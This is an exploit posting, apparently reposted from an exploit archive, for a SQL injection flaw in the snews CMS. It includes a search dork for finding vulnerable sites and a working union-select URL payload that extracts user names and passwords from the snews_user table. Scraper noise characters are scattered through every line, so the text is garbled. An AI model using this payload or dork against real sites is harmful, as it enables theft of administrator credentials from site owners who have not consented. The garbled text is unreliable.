标题: CMS snews SQL Injection Vulnerability
7 ~8 F. H0 Q5 h7 O, I5 I- o* j作者: By onestree6 U1 c* q0 t' N$ o- ^
下载地址 : http://snewscms.com/0 u7 x. r( L g
测试平台 : ubuntu 12.10 / win 7
; y7 Y* |! L7 g& R5 l6 ~4 E% l关键词: inurl:"tanyakan pada rumput yang bergoyang", J2 P8 t' | I% F
6 V9 h* h; B2 f9 ^
# O. {8 D8 k( g" m- F*************************************************************8 q7 n2 i8 G/ Z7 a8 d. Y
" O( W. g7 T1 z# V+ U* f' P
SQL poc:; \: \4 Y ]# S+ G
9 a3 a' b- ?* K0 Y7 B! ?http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]5 k$ w' E* O6 d, m: [0 t
' _ `: A3 R9 y
示例* t* \1 c$ t* S
* s: ]' r# L/ q
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/** Z8 e8 W- O. ?, M6 l8 e/ P6 u
% j0 i1 v% Q' B; K
2 f9 y& c& D) a b- r; v5 H致谢:
& @7 F' W* V$ x5 K$ a 1 ?5 g9 i/ v1 Q2 o' a6 y
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell; h$ Q) d1 i) I* x2 `7 Q( m, B% B
K/ G$ }- H1 G- J" r
indonesiancoder - moeslimh4x0r - go-coder' _) a8 J3 v# M n5 |
, o) r/ X* J$ x5 ]. k$ Y8 n$ X
spesial my hunny :*
6 d8 `, Q% z" W: j0 [6 U( h |